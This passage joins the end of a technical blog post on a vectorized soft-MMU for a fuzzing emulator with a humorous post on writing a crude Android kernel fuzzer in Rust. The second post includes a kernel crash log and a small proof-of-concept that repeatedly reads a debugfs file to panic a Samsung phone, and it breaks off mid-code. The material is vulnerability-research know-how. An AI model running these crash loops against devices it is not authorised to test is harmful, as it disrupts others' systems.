The overall result of this model is that memory only is ever read from disk if ever used, it then is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.

In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.

All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.

This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.

Deduplicated memory

Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!

Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.

This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the master, we can instead maintain a HashSet of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated HashSet, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this HashSet with the aliased bit set. Since pages also contain the permissions, this automatically handles creating different copies of the same memory contents with different permissions.
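A minimal sketch of the deduplication, with a page simplified to just its raw interleaved bytes (the real page tables store aliased pointers into this set):

use std::collections::HashSet;

/// Simplified dedup pool: a "page" here is just its raw interleaved bytes
struct Dedup {
    pages: HashSet<Vec<u8>>,
}

impl Dedup {
    /// Add a page, returning a reference to the single shared copy which
    /// the page tables then alias (with the aliased bit set)
    fn add_page(&mut self, page: Vec<u8>) -> &Vec<u8> {
        self.pages.insert(page.clone());
        self.pages.get(&page).unwrap()
    }
}

fn main() {
    let mut dedup = Dedup { pages: HashSet::new() };
    dedup.add_page(vec![0u8; 128]);
    dedup.add_page(vec![0u8; 128]); // identical page: nothing new is stored
    assert_eq!(dedup.pages.len(), 1);
}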

Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other aliased memory, it can be cow memory and cloned if modified.

The gain from this is minimal in practice, but the code complexity increase given we already handle cow and aliased memory is so little that there’s really no reason to not do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.

For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.

cow_and_dedup


Performance

Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.

There are two important aspects to performance:

  • The JIT
  • Injecting fuzz cases / allocating memory

The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible for bringing our best-case 2 trillion instructions/second benchmark down to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.

Next we have the maybe-not-so-obvious performance-critical aspect: getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).

Further, the VM may dynamically allocate memory via malloc(), which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times per fuzz case, so this could result in potentially tens of millions of MMU modifications per second.

The JIT / IL

We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.

When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.

Differing addresses

Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).

Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.

The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.

We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty. As it’s guaranteed to not be aliased if it’s dirty.

Vectorized translation

However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.

To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if any VM failed, and if it did we can report the failure correctly for all VMs that failed at any point during the translation. This allows us to get a correct caused_vmexit mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.

Vectorized dirty list updating

Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.

To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.

However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.

IL MMU routines

I’m going to have a whole blog on my IL, but it’s a simple SSA IL.

Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.

For example, a 4-byte translate for writing of rsp+0x50 occurs at the root block of a function. Now future locations in the graph which read or write the same location with 4-or-fewer bytes can reuse the translation. Since it’s an SSA the rsp+0x50 value is tied to a certain version of rsp, thus changes to rsp do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.

Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.

Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.

Since it’s possible a VM exit occurs and memory/permissions are changed, I must have invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.

The performance numbers

These are the performance numbers (in cycles) for each type and size of operation. The translate times are the cost of walking the page tables and validating permissions, the access times are the cost of reading/writing to already translated memory. The benchmarks were done on a Xeon Phi 7210 on a single hardware thread. All times are in cycles for a translation and access times for all 8 lanes.

These are best-case translate/access times as it’s the same memory translated in a loop over and over causing the tables and memory in question to be present in L1 cache.

The divergent cases are ones where different addresses were supplied to each lane and force vectorized page walks.

Write: false | opsize: 1 | Diverge: false | Translate    37.8132 cycles | Access    10.5450 cycles
Write: false | opsize: 2 | Diverge: false | Translate    39.0831 cycles | Access    11.3500 cycles
Write: false | opsize: 4 | Diverge: false | Translate    39.7298 cycles | Access    10.6403 cycles
Write: false | opsize: 8 | Diverge: false | Translate    35.2704 cycles | Access     9.6881 cycles
Write: true  | opsize: 1 | Diverge: false | Translate    44.9504 cycles | Access    16.6908 cycles
Write: true  | opsize: 2 | Diverge: false | Translate    45.9377 cycles | Access    15.0110 cycles
Write: true  | opsize: 4 | Diverge: false | Translate    44.8083 cycles | Access    16.0191 cycles
Write: true  | opsize: 8 | Diverge: false | Translate    39.7565 cycles | Access     8.6500 cycles
Write: false | opsize: 1 | Diverge: true  | Translate   140.2084 cycles | Access    16.6964 cycles
Write: false | opsize: 2 | Diverge: true  | Translate   141.0708 cycles | Access    16.7114 cycles
Write: false | opsize: 4 | Diverge: true  | Translate   140.0859 cycles | Access    16.6728 cycles
Write: false | opsize: 8 | Diverge: true  | Translate   137.5321 cycles | Access    14.1959 cycles
Write: true  | opsize: 1 | Diverge: true  | Translate   158.5673 cycles | Access    22.9880 cycles
Write: true  | opsize: 2 | Diverge: true  | Translate   159.3837 cycles | Access    21.2704 cycles
Write: true  | opsize: 4 | Diverge: true  | Translate   156.8409 cycles | Access    22.9207 cycles
Write: true  | opsize: 8 | Diverge: true  | Translate   156.7783 cycles | Access    16.6400 cycles

Performance analysis

These numbers actually look really good. Just about 10 or so cycles for most accesses. The translations are much more expensive but with TLBs and caching the translations in the IL tree we should hopefully do these things rarely. The divergent translation times are about 3.5x more expensive than the scalar counterparts which is pretty impressive. 8 separate page walks at only 3.5x more cost than a single walk! That’s a big win for this new MMU!

TLBs (not implemented as of this writing)

Similar to the cached translations in the IL tree, I can have a TLB which caches a limited amount of arbitrary translations, just like an actual CPU or many other JITs. I currently plan on having TLB entries for each type of operation such that no permission checks are needed on read/write routines. However I could use a more typical TLB model where translations are cached (rather than permission checks and RaW updates), and then I would have to perform permission checks and RaW updates on all memory accesses (but not the translation phase).

I plan to just implement both models and benchmark them. The complexity of theorizing this performance difference is higher than just doing it and getting real measurements…

Fast injection/permission modifications

To support fast fuzz case injection and permission changes I have a few handwritten AVX-512 routines which are optimized for speed. These can then be tested against the naive reference implementation for correctness as there’s a much higher chance for mistakes.

I expose 3 different routines for this. A vectorized broadcast (writing the same memory to multiple VMs), a vectorized memset (applying the same byte to either memory contents or permissions), and a vectorized write-multiple.

Vectorized broadcast

This one is pretty simple. You supply an address in the VM, a payload, and a mask (deciding which VMs to actually write to). This will then write the same payload to all VMs which are enabled by the mask. This surprisingly doesn’t have a huge use case that I can think of yet.

Vectorized memset

Since permissions and memory are stored right next to each other this memset is written in a way that it can be used to update either permissions or contents. This takes in an address, a byte to broadcast, a bool indicating if it should write to permissions or contents, and a mask of VMs to broadcast to.

This routine is how permissions are updated in bulk. I can quickly update permissions on arbitrary sets of VMs in a vectorized manner. Further it can be used on contents to do things like handle zeroing of memory on a hooked call like malloc().

Vectorized write-multiple

This is how we get fuzz cases in. I take one address, a VM mask, and multiple inputs. I then inject those inputs to their corresponding VMs all at the same address. This allows me to write all my differing fuzz cases to the same location in memory very quickly. Since most fuzzing is writing an input to all VMs at the same location this should suffice for most cases. If I find I’m frequently writing multiple inputs to multiple different locations I’ll probably make another specialized routine.

Due to the complexities of handling partial reads from the input buffers in a vectorized way, this routine is restricted to writing 8-byte size aligned payloads to 8-byte aligned addresses. To get around this I just pad out my fuzz inputs to 8-byte boundaries.
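Padding an input out to the next 8-byte boundary is a one-liner; here’s a quick sketch:

/// Pad a fuzz input to an 8-byte boundary so it can be injected with the
/// 8-byte-aligned vectorized write-multiple routine
fn pad_input(mut input: Vec<u8>) -> Vec<u8> {
    let padded_len = (input.len() + 7) & !7;
    input.resize(padded_len, 0);
    input
}

fn main() {
    assert_eq!(pad_input(vec![0x41; 10]).len(), 16);
    assert_eq!(pad_input(vec![0x41; 16]).len(), 16);
}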

Are these fast routines really needed?

To answer that, here are the benchmarks for the naive Rust implementation for a page table of shape [16, 16, 16, 13, 3]:

Note that the benchmarks are a single hardware thread running on a Xeon Phi 7210

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1873 seconds
1024 byte chunks read per second                30115.5741
1024 byte chunks written per second             29243.0394
1024 byte chunks memset per second              29340.3969
1024 byte chunks permed per second              34971.7952
1024 byte chunks write multiple per second       6864.1243

And the AVX-512 handwritten implementation on the same machine and same shape:

Empty SoftMMU created in                            0.0000 seconds
1 MiB of deduped memory added in                    0.1878 seconds
1024 byte chunks read per second                30073.5090
1024 byte chunks written per second            770678.8377
1024 byte chunks memset per second             777488.8143
1024 byte chunks permed per second             780162.1310
1024 byte chunks write multiple per second     751352.4038

Effectively a 25x speedup for the same result!

With a larger page size ([16, 16, 16, 6, 10]) this number goes down as I can use the old translation longer and I spend less time translating pages:

Rust implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0829 seconds
1024 byte chunks read per second                30201.6634
1024 byte chunks written per second             31850.8188
1024 byte chunks memset per second              31818.1619
1024 byte chunks permed per second              34690.8332
1024 byte chunks write multiple per second       7345.5057

Hand-optimized implementations:

Empty SoftMMU created in                            0.0001 seconds
1 MiB of deduped memory added in                    0.0826 seconds
1024 byte chunks read per second                30168.3047
1024 byte chunks written per second          32993840.4624
1024 byte chunks memset per second           33131493.5139
1024 byte chunks permed per second           36606185.6217
1024 byte chunks write multiple per second   10775641.4470

In this case it’s over 1000x faster for some of the implementations! At this rate we can trivially get inputs in much faster than the underlying code possibly could run!


Future improvements/ideas

Currently a full 64-bit address space is emulated. Since nothing we emulate uses a full 64-bit address space this is overkill and increases the page table memory size and page table walk costs. In the future I plan to add support for partial address space support. For example if you only define the page table to handle 16-bit addresses, it will, optionally based on another constant, make sure addresses are sign-extended or zero-extended from these 16-bit addresses. By supporting both sign-extended and zero-extended addresses we should be able to model all architecture’s specific behaviors. This means if running a 32-bit application in our 64-bit JIT we could use a 32-bit address space and decrease the cost of the MMU.

I could add more fast-injection routines as needed.

I may move permission checks to loads/stores rather than translation IL operations, to allow reuse of TLB entries for the same page but differing offsets/operations.

Writing the worlds worst Android fuzzer, and then improving it

18 October 2018 at 09:57

So slimy it belongs in the slime tree

Why

Changelog

Date         Info
2018-10-18   Initial

Tweeter

Follow me at @gamozolabs on Twitter if you want notifications when new blogs come up, or I think you can use RSS or something if you’re still one of those people.

Disclaimer

I recognize the bugs discussed here are not widespread Android bugs individually. None of these are terribly critical and typically only affect one specific device. This blog is meant to be fun and silly and not meant to be a serious review of Android’s security.

Give me the code

Slime Tree Repo

Intro

Today we’re going to write arguably one of the worst Android fuzzers possible. Experience unexpected success, and then make improvements to make it probably the second worst Android fuzzer.

When doing Android device fuzzing the first thing we need to do is get a list of devices on the phone and figure out which ones we can access. This is simple right? All we have to do is go into /dev and run ls -l, and anything with read or write permissions for all users we might have a whack at. Well… with selinux this is just not the case. There might be one person in the world who understands selinux but I’m pretty sure you need a Bombe to decode the selinux policies.

To solve this problem let’s do it the easy way and write a program that just runs in the context we want bugs from. This program will simply recursively list all files on the phone and actually attempt to open them for reading and writing. This will give us the true list of files/devices on the phone we are able to open. In this blog’s case we’re just going to use adb shell and thus we’re running as u:r:shell:s0.

Recursive listdiring

Alright so I want a quick list of all files on the phone and whether I can read or write to them. This is pretty easy, let’s do it in Rust.

use std::fs::OpenOptions;
use std::path::{Path, PathBuf};

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

Woo, that was pretty simple, to get a full directory listing of the whole phone we can just:

// List all files on the system
let mut dirlisting = Vec::new();
listdirs(Path::new("/"), &mut dirlisting);

Fuzzing

So now we have a list of all files. We now can use this for manual analysis and look through the listing and start doing source auditing of the phone. This is pretty much the correct way to find any good bugs, but maybe we can automate this process?

What if we just randomly try to read and write to the files? We don’t really have any idea what they expect, so let’s just write random garbage of reasonable sizes to them.

// List all files on the system
let mut listing = Vec::new();
listdirs(Path::new("/"), &mut listing);

// Fuzz buffer
let mut buf = [0x41u8; 8192];

// Fuzz forever
loop {
    // Pick a random file
    let rand_file = rand::random::<usize>() % listing.len();
    let (path, can_read, can_write) = &listing[rand_file];

    print!("{:?}\n", path);

    if *can_read {
        // Fuzz by reading
        let fd = OpenOptions::new().read(true).open(path);

        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.read(&mut buf[..fuzz_size]);
        }
    }

    if *can_write {
        // Fuzz by writing
        let fd = OpenOptions::new().write(true).open(path);
        if let Ok(mut fd) = fd {
            let fuzz_size = rand::random::<usize>() % buf.len();
            let _ = fd.write(&buf[..fuzz_size]);
        }
    }
}

When running this it pretty much stops right away, getting hung on things like /sys/kernel/debug/tracing/per_cpu/cpu1/trace_pipe. There are typically many sysfs and procfs files on the phone that will hang forever when trying to read from them. Since this prevents our “fuzzer” from running any longer we need to somehow get around blocking reads.

How about we just make, let’s say… 128 threads and just be okay with threads hanging? At least some of the others will keep going for at least a while. Here’s the complete program:

extern crate rand;

use std::sync::Arc;
use std::fs::OpenOptions;
use std::io::{Read, Write};
use std::path::{Path, PathBuf};

/// Maximum number of threads to fuzz with
const MAX_THREADS: u32 = 128;

/// Recursively list all files starting at the path specified by `dir`, saving
/// all files to `output_list`
fn listdirs(dir: &Path, output_list: &mut Vec<(PathBuf, bool, bool)>) {
    // List the directory
    let list = std::fs::read_dir(dir);

    if let Ok(list) = list {
        // Go through each entry in the directory, if we were able to list the
        // directory safely
        for entry in list {
            if let Ok(entry) = entry {
                // Get the path representing the directory entry
                let path = entry.path();

                // Get the metadata and discard errors
                if let Ok(metadata) = path.symlink_metadata() {
                    // Skip this file if it's a symlink
                    if metadata.file_type().is_symlink() {
                        continue;
                    }

                    // Recurse if this is a directory
                    if metadata.file_type().is_dir() {
                        listdirs(&path, output_list);
                    }

                    // Add this to the directory listing if it's a file
                    if metadata.file_type().is_file() {
                        let can_read =
                            OpenOptions::new().read(true).open(&path).is_ok();
                        
                        let can_write =
                            OpenOptions::new().write(true).open(&path).is_ok();

                        output_list.push((path, can_read, can_write));
                    }
                }
            }
        }
    }
}

/// Fuzz thread worker
fn worker(listing: Arc<Vec<(PathBuf, bool, bool)>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    // Fuzz forever
    loop {
        let rand_file = rand::random::<usize>() % listing.len();
        let (path, can_read, can_write) = &listing[rand_file];

        //print!("{:?}\n", path);

        if *can_read {
            // Fuzz by reading
            let fd = OpenOptions::new().read(true).open(path);

            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }

        if *can_write {
            // Fuzz by writing
            let fd = OpenOptions::new().write(true).open(path);
            if let Ok(mut fd) = fd {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.write(&buf[..fuzz_size]);
            }
        }
    }
}

fn main() {
    // Optionally daemonize so we can swap from an ADB USB cable to a UART
    // cable and let this continue to run
    //daemonize();

    // List all files on the system
    let mut dirlisting = Vec::new();
    listdirs(Path::new("/"), &mut dirlisting);

    print!("Created listing of {} files\n", dirlisting.len());

    // We wouldn't do anything without any files
    assert!(dirlisting.len() > 0, "Directory listing was empty");

    // Wrap it in an `Arc`
    let dirlisting = Arc::new(dirlisting);

    // Spawn fuzz threads
    let mut threads = Vec::new();
    for _ in 0..MAX_THREADS {
        // Create a unique arc reference for this thread and spawn the thread
        let dirlisting = dirlisting.clone();
        threads.push(std::thread::spawn(move || worker(dirlisting)));
    }

    // Wait for all threads to complete
    for thread in threads {
        let _ = thread.join();
    }
}

extern {
    fn daemon(nochdir: i32, noclose: i32) -> i32;
}

pub fn daemonize() {
    print!("Daemonizing\n");

    unsafe {
        daemon(0, 0);
    }

    // Sleep to allow a physical cable swap
    std::thread::sleep(std::time::Duration::from_secs(10));
}

Pretty simple, nothing crazy here. We get a full phone directory listing, spin up MAX_THREADS threads, and those threads loop forever picking random files to read and write to.

Let me just give this a little push to the phone annnnnnnnnnnnnnd… and the phone panicked. In fact almost all the phones I have at my desk panicked!

There we go. We have created a world class Android kernel fuzzer, printing out new 0-day!

In this case we ran this on a Samsung Galaxy S8 (G950FXXU4CRI5), let’s check out how we crashed by reading /proc/last_kmsg from the phone:

Unable to handle kernel paging request at virtual address 00662625
sec_debug_set_extra_info_fault = KERN / 0x662625
pgd = ffffffc0305b1000
[00662625] *pgd=00000000b05b7003, *pud=00000000b05b7003, *pmd=0000000000000000
Internal error: Oops: 96000006 [#1] PREEMPT SMP
exynos-snapshot: exynos_ss_get_reason 0x0 (CPU:1)
exynos-snapshot: core register saved(CPU:1)
CPUMERRSR: 0000000002180488, L2MERRSR: 0000000012240160
exynos-snapshot: context saved(CPU:1)
exynos-snapshot: item - log_kevents is disabled
TIF_FOREIGN_FPSTATE: 0, FP/SIMD depth 0, cpu: 0
CPU: 1 MPIDR: 80000101 PID: 3944 Comm: Binder:3781_3 Tainted: G        W       4.4.111-14315050-QB19732135 #1
Hardware name: Samsung DREAMLTE EUR rev06 board based on EXYNOS8895 (DT)
task: ffffffc863c00000 task.stack: ffffffc863938000
PC is at kmem_cache_alloc_trace+0xac/0x210
LR is at binder_alloc_new_buf_locked+0x30c/0x4a0
pc : [<ffffff800826f254>] lr : [<ffffff80089e2e50>] pstate: 60000145
sp : ffffffc86393b960
[<ffffff800826f254>] kmem_cache_alloc_trace+0xac/0x210
[<ffffff80089e2e50>] binder_alloc_new_buf_locked+0x30c/0x4a0
[<ffffff80089e3020>] binder_alloc_new_buf+0x3c/0x5c
[<ffffff80089deb18>] binder_transaction+0x7f8/0x1d30
[<ffffff80089e0938>] binder_thread_write+0x8e8/0x10d4
[<ffffff80089e11e0>] binder_ioctl_write_read+0xbc/0x2ec
[<ffffff80089e15dc>] binder_ioctl+0x1cc/0x618
[<ffffff800828b844>] do_vfs_ioctl+0x58c/0x668
[<ffffff800828b980>] SyS_ioctl+0x60/0x8c
[<ffffff800815108c>] __sys_trace_return+0x0/0x4

Ah cool, derefing 0x00662625, my favorite kernel address! Looks like it's some form of heap corruption. We could probably exploit this, especially since mapping in 0x00662625 from userland would let us control a kernel-land object. It would require the right groom. This specific bug has been minimized and you can find a targeted PoC in the Wall of Shame section.

Using the “fuzzer”

You’d think this fuzzer is pretty trivial to run, but there are some things that can really help it along. Especially on phones which seem to fight back a bit.

Protips:

  • Restart fuzzer regularly, it gets stuck a lot
  • Do random things on the phone like browsing or using the camera to generate kernel activity
  • Kill the app and unplug the ADB USB cable frequently, this can cause some of the bugs to trigger when the application suddenly dies
  • Tweak the MAX_THREADS value from low values to high values
  • Create blacklists for files which are known to block forever on reads

Using the above protips I’ve been able to get this fuzzer to work on almost every phone I have encountered in the past 4 years, with dwindling success as selinux policies get stricter.

Next device

Okay so we’ve looked at the latest Galaxy S8, let’s try to look at an older Galaxy S5 (G900FXXU1CRH1). Whelp, that one crashed even faster. However if we try to get /proc/last_kmsg we will discover that this file does not exist. We can also try using a fancy UART cable over USB with the magic 619k resistor and daemonize() the application so we can observe the crash over that. However that didn’t work in this case either (honestly not sure why, I get dmesg output but no panic log).

So now we have this problem. How do we root cause this bug? Well, we can do a binary search of the filesystem, blacklisting files in certain folders, and try to whittle it down. Let's give that a shot!

First let’s only allow use of /sys/* and beyond, all other files will be disallowed, typically these bugs from the fuzzer come from sysfs and procfs. We’ll do this by changing the directory listing call to listdirs(Path::new("/sys"), &mut dirlisting);

Woo, it worked! Crashed faster, and this time we limited to /sys. So we know the bug exists somewhere in /sys.

Now we’ll go deeper in /sys, maybe we try /sys/devices… oops, no luck. We’ll have to try another. Maybe /sys/kernel?… WINNER WINNER!

So we’ve whittled it down further to /sys/kernel/debug but now there are 85 folders in this directory. I really don’t want to manually try all of them. Maybe we can improve our fuzzer?

Improving the fuzzer

So currently we have no idea which files were touched to cause the crash. We can print them and then view them over ADB, however that output doesn't make it out before the phone panics… we need something even better.

Perhaps we should just send the filenames we’re fuzzing over the network and then have a service that acks the filenames, such that the files are not touched unless they have been confirmed to be reported over the wire. Maybe this would be too slow? Hard to say. Let’s give it a go!

We’ll make a quick server in Rust to run on our host, and then let the phone connect to this server over ADB USB via adb reverse tcp:13370 tcp:13370, which will forward connections to 127.0.0.1:13370 on the phone to our host where our program is running and will log filenames.

Designing a terrible protocol

We need a quick protocol that works over TCP to send filenames. I’m thinking something super easy. Send the filename, and then the server responds with “ACK”. We’ll just ignore threading issues and the fact that heap corruption bugs will usually show up after the file was accessed. We don’t want to get too carried away and make a reasonable fuzzer, eh?

use std::net::TcpListener;
use std::io::{Read, Write};

fn main() -> std::io::Result<()> {
    let listener = TcpListener::bind("0.0.0.0:13370")?;

    let mut buffer = vec![0u8; 64 * 1024];

    for stream in listener.incoming() {
        print!("Got new connection\n");

        let mut stream = stream?;

        loop {
            if let Ok(bread) = stream.read(&mut buffer) {
                // Connection closed, break out
                if bread == 0 {
                    break;
                }

                // Send acknowledge
                stream.write(b"ACK").expect("Failed to send ack");
                stream.flush().expect("Failed to flush");

                let string = std::str::from_utf8(&buffer[..bread])
                    .expect("Invalid UTF-8 character in string");
                print!("Fuzzing: {}\n", string);
            } else {
                // Failed to read, break out
                break;
            }
        }
    }

    Ok(())
}

This server is pretty trash, but it’ll do. It’s a fuzzer anyways, can’t find bugs without buggy code.

Client side

From the phone we just implement a simple function:

use std::io::{Read, Write};
use std::net::TcpStream;
use std::sync::{Arc, Mutex};

// In main(): connect to the server we report to and pass this along to
// functions/threads that need socket access
let stream = Arc::new(Mutex::new(TcpStream::connect("127.0.0.1:13370")
    .expect("Failed to open TCP connection")));

fn inform_filename(handle: &Mutex<TcpStream>, filename: &str) {
    // Report the filename
    let mut socket = handle.lock().expect("Failed to lock mutex");
    socket.write_all(filename.as_bytes()).expect("Failed to write");
    socket.flush().expect("Failed to flush");

    // Wait for an ACK
    let mut ack = [0u8; 3];
    socket.read_exact(&mut ack).expect("Failed to read ack");
    assert!(&ack == b"ACK", "Did not get ACK as expected");
}
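
For completeness, here's one hypothetical way the worker loop could be reworked to use this (a sketch building on the `worker` and `inform_filename` code above; `reporting_worker` is a made-up name, and write fuzzing is omitted for brevity):

use std::fs::OpenOptions;
use std::io::Read;
use std::net::TcpStream;
use std::path::PathBuf;
use std::sync::{Arc, Mutex};

/// Hypothetical worker that reports every filename (and waits for the ACK)
/// before touching the file, so the host-side log always shows the last file
/// we were about to fuzz
fn reporting_worker(listing: Arc<Vec<(PathBuf, bool, bool)>>,
                    stream:  Arc<Mutex<TcpStream>>) {
    // Fuzz buffer
    let mut buf = [0x41u8; 8192];

    loop {
        let (path, can_read, _) =
            &listing[rand::random::<usize>() % listing.len()];

        // Report before the access so a panic can't hide the filename
        inform_filename(&stream, &path.to_string_lossy());

        if *can_read {
            if let Ok(mut fd) = OpenOptions::new().read(true).open(path) {
                let fuzz_size = rand::random::<usize>() % buf.len();
                let _ = fd.read(&mut buf[..fuzz_size]);
            }
        }
    }
}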

Developing blacklist

Okay so now we have a log of all files we're fuzzing, and they're confirmed by the server so we don't lose anything. Let's set it to single-threaded mode so we don't have to worry about race conditions for now.

We’ll see it frequently gets hung up on files. We’ll make note of the files it gets hung up on and start developing a blacklist. This takes some manual labor, and usually there are a handful (5-10) files we need to put in this list. I typically make my blacklist based on the start of a filename, thus I can blacklist entire directories based on starts_with matching.

Back to fuzzing

So when fuzzing, the last file we saw touched before the crash was /sys/kernel/debug/smp2p_test/ut_remote_gpio_inout.

Let’s hammer this in a loop… and it worked! So now we can develop a fully self contained PoC:

use std::fs::File;
use std::io::Read;

fn thrasher() {
    // Buffer to read into
    let mut buf = [0x41u8; 8192];

    // Path of the file to hammer (`fn` is a keyword, so use `path`)
    let path = "/sys/kernel/debug/smp2p_test/ut_remote_gpio_inout";

    loop {
        if let Ok(mut fd) = File::open(path) {
            let _ = fd.read(&mut buf);
        }
    }
}

fn main() {
    // Make fuzzing threads
    let mut threads = Vec::new();
    for _ in 0..4 {
        threads.push(std::thread::spawn(move || thrasher()));
    }

    // Wait for all threads to exit
    for thr in threads {
        let _ = thr.join();
    }
}

What a top tier PoC!

Next bug?

So now that we have root caused the bug, we should blacklist the specific file we know caused the bug and try again. Potentially this bug was hiding another.

Nope, nothing else, the S5 is officially secure and fixed of all bugs.

The end of an era

Sadly this fuzzer is on the way out. It used to work almost universally on every phone, and still does if selinux is set to permissive. But sadly as time has gone on these bugs have become hidden behind selinux policies that prevent them from being reached. It now only works on a few phones that I have rather than all of them, but the fact that it ever worked is probably the best part of it all.

There is a lot that could be done to improve this fuzzer, but the goal of this article was to make a terrible fuzzer, not a reasonable one. The big things to add to make it better:

  • Make it perform random ioctl() calls (see the sketch after this list)
  • Make it attempt to mmap() and use the mappings for these devices
  • Actually understand what the file expects
  • Use multiple processes or something to let the fuzzer continue to run when it gets stuck
  • Run it for more than 1 minute before giving up on a phone
  • Make better blacklists/whitelists
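
As a taste of the first item, here's a minimal sketch using the libc crate. `random_ioctls` is a made-up helper, the request numbers are pure garbage, and a real version would want to target valid ioctl numbers per driver:

extern crate libc;
extern crate rand;

use std::fs::File;
use std::os::unix::io::AsRawFd;

/// Hypothetical helper: throw a handful of garbage ioctls at a device file,
/// ignoring all errors
fn random_ioctls(path: &str) {
    if let Ok(fd) = File::open(path) {
        for _ in 0..16 {
            // Totally random request number and a null argument; `as _` lets
            // the request take whatever integer type libc expects here
            let request = rand::random::<u32>();
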